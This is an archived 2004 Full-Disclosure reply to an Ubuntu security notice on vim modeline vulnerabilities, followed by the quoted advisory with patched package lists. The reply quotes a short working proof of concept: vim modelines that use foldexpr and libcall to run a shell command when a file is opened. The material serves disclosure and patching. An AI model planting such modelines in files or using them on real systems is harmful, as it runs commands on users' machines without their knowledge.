lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <41CB9B90.4090208@umbrella.name>
Date: Fri, 24 Dec 2004 12:31:12 +0800
From: Liu Die Yu <liudieyu@...rella.name>
To: Martin Pitt <martin.pitt@...onical.com>
Cc: bugtraq@...urityfocus.com, ubuntu-security-announce@...ts.ubuntu.com,
        full-disclosure@...ts.netsys.com
Subject: Re: [USN-52-1] vim vulnerability


the credit really should go to Georgi Guninski who said:
----------
[...]
Opening a specially crafted text file with vim can execute arbitrary 
shell commands and pass parameters to them.
[...]
The problem are so called modelines, which can execute some commands in 
vim, though they are intended to be sandboxed.
[...]
----------
and provided a working demo:
----------
/* vim:set foldmethod=expr: */
/* vim:set 
foldexpr=confirm(libcall("/lib/libc.so.6","system","/bin/ls"),"ms_sux"): */

vim better than windoze
----------
in 2002 at
http://www.guninski.com/vim1.html

BTW, i really want to a video showing advanced VIM typer editing text 
extremely fast. it can be a good material to convince newbie to use VIM.

http://editive.com/referrer

Martin Pitt wrote:

>===========================================================
>Ubuntu Security Notice USN-52-1		  December 23, 2004
>vim vulnerability
>CAN-2004-1138
>===========================================================
>
>A security issue affects the following Ubuntu releases:
>
>Ubuntu 4.10 (Warty Warthog)
>
>The following packages are affected:
>
>kvim
>vim
>vim-gnome
>vim-gtk
>vim-lesstif
>vim-perl
>vim-python
>vim-tcl
>
>The problem can be corrected by upgrading the affected package to
>version 1:6.3-025+1ubuntu2.1.  In general, a standard system upgrade is
>sufficient to effect the necessary changes.
>
>Details follow:
>
>Ciaran McCreesh found several vulnerabilities related to the use of
>options in Vim modeline commands, such as 'termcap', 'printdevice',
>'titleold', 'filetype', 'syntax', 'backupext', 'keymap', 'patchmode',
>and 'langmenu'.
>
>If an attacker tricked an user to open a file with a specially crafted
>modeline, he could exploit this to execute arbitrary commands with the
>user's privileges.
>
>  Source archives:
>
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.3-025+1ubuntu2.1.diff.gz
>      Size/MD5:   424979 4965410b651e6f5ac01ba2500e45d1ad
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.3-025+1ubuntu2.1.dsc
>      Size/MD5:     1122 fbabe18da525c6874e00e7144dc1015f
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.3.orig.tar.gz
>      Size/MD5:  5624622 de1c964ceedbc13538da87d2d73fd117
>
>  Architecture independent packages:
>
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.3-025+1ubuntu2.1_all.deb
>      Size/MD5:  3421062 5e19fadc78b2d58baf8b9c0e469bffe9
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-doc_6.3-025+1ubuntu2.1_all.deb
>      Size/MD5:  1646594 0aacbc8f415aac67d4ff67c2567ea9fc
>
>  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
>
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/kvim_6.3-025+1ubuntu2.1_amd64.deb
>      Size/MD5:     2586 dffb544da03f75c78a04240c1a226034
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.3-025+1ubuntu2.1_amd64.deb
>      Size/MD5:   805718 684db5c3346c4369b47131fa1e12130e
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.3-025+1ubuntu2.1_amd64.deb
>      Size/MD5:   802444 d62cb45626f58a3d04286734c9f0fff4
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-lesstif_6.3-025+1ubuntu2.1_amd64.deb
>      Size/MD5:   784098 b6023cf232ce1177206aebc3a002ea10
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.3-025+1ubuntu2.1_amd64.deb
>      Size/MD5:   809126 2414707b703fb83ac166eef291e00f14
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.3-025+1ubuntu2.1_amd64.deb
>      Size/MD5:   802464 f9fc02b7e2bddaf8c579b88556b49e52
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.3-025+1ubuntu2.1_amd64.deb
>      Size/MD5:   801154 63c0de866afbe3e898c22dd1c571e4f9
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.3-025+1ubuntu2.1_amd64.deb
>      Size/MD5:   764954 4efd27d92715dd0b3d518b85a5fdaa23
>
>  i386 architecture (x86 compatible Intel/AMD)
>
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/kvim_6.3-025+1ubuntu2.1_i386.deb
>      Size/MD5:     2590 d66ae294e991c2a7795800ce109c4ed2
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.3-025+1ubuntu2.1_i386.deb
>      Size/MD5:   702646 0b2b804684a446045fc7b459f80b1c33
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.3-025+1ubuntu2.1_i386.deb
>      Size/MD5:   699996 38435bc2a97e3dae68aeacb41aa6ee46
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-lesstif_6.3-025+1ubuntu2.1_i386.deb
>      Size/MD5:   682456 7346dca98d32990cbda11b28dcf9de98
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.3-025+1ubuntu2.1_i386.deb
>      Size/MD5:   707678 0cebe040f27ff421c046c0bba0c7be5a
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.3-025+1ubuntu2.1_i386.deb
>      Size/MD5:   700016 218129f6116b1ed0cac566b4ed3bb91a
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.3-025+1ubuntu2.1_i386.deb
>      Size/MD5:   699624 8f41f595aeb4b798b932cafdae5b428c
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.3-025+1ubuntu2.1_i386.deb
>      Size/MD5:   680000 648b6f8d31502eb282c6c8e598b1bfb3
>
>  powerpc architecture (Apple Macintosh G3/G4/G5)
>
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/kvim_6.3-025+1ubuntu2.1_powerpc.deb
>      Size/MD5:     2594 9b73d310934283adb3443ba1cf698cfc
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.3-025+1ubuntu2.1_powerpc.deb
>      Size/MD5:   788010 a0fb73fac7af675b50670878eff5e7a1
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.3-025+1ubuntu2.1_powerpc.deb
>      Size/MD5:   785336 fa097c36bb3fbdde3cc61131e06894b3
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-lesstif_6.3-025+1ubuntu2.1_powerpc.deb
>      Size/MD5:   769820 960874ca1a9d2f184fb70a7c67712ff2
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.3-025+1ubuntu2.1_powerpc.deb
>      Size/MD5:   792352 33cdd008c6f7ee7ce5b7eb207e3a23d3
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.3-025+1ubuntu2.1_powerpc.deb
>      Size/MD5:   785350 f9ea0ded3300b32c8f464469666a2739
>    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.3-025+1ubuntu2.1_powerpc.deb
>      Size/MD5:   784864 1b286b54ecb25d6aa7b611122c5ad7b3
>    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.3-025+1ubuntu2.1_powerpc.deb
>      Size/MD5:   754470 04d272608873af561b091de313b7167c
>  
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ